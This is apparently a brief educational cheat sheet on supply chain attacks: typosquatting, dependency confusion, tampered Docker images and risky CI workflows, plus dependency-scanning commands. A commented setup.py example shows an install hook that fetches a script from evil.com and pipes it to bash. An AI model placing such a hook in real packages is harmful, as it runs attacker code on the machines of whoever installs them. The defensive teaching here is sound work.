Supply Chain Attack Simulation
SUPPLY CHAIN
# Supply chain attacks target dependencies instead of the app directly
# ATTACK 1: Typosquatting (npm/pip/PyPI)
# Attacker publishes a package with a similar name:
# Real: requests → Fake: requets, request
# Real: lodash → Fake: lodahs, 1odash
# Real: django → Fake: djang0, djangoo
# Malicious package executes on install:
# setup.py:
# import subprocess
# subprocess.run(["curl", "http://evil.com/steal.sh", "|", "bash"])
# Prevention: pin exact versions, use lock files, scan with safety/snyk
# ATTACK 2: Dependency confusion
# Company uses internal packages e.g. corp-utils@1.0.0
# Attacker publishes corp-utils@2.0.0 on public PyPI/npm
# npm/pip prefers higher version from public registry
# ATTACK 3: Compromised base Docker image
# Official-looking image on Docker Hub with backdoor:
# FROM python:3.11 → FROM pyt0n:3.11 (typosquat)
# Or a legitimate image gets compromised
# Check image integrity:
docker trust inspect python:3.11
docker scout cves python:3.11 # CVE scan
# ATTACK 4: GitHub Actions malicious workflow
# A dependency's GitHub Actions workflow can access your repo's secrets
# if you give it write permissions
# REAL EXAMPLES:
# - SolarWinds: malicious update pushed to 18,000 organizations
# - Log4Shell: single library vulnerability in 3 billion+ devices
# - event-stream npm: maintainer handed over package, backdoor added
# - codecov: supply chain attack stole AWS keys from 23,000+ orgs
# Scan your dependencies:
pip audit # Python
npm audit # Node.js
trivy image your-image:latest # Docker image CVE scan
snyk test # Multi-platform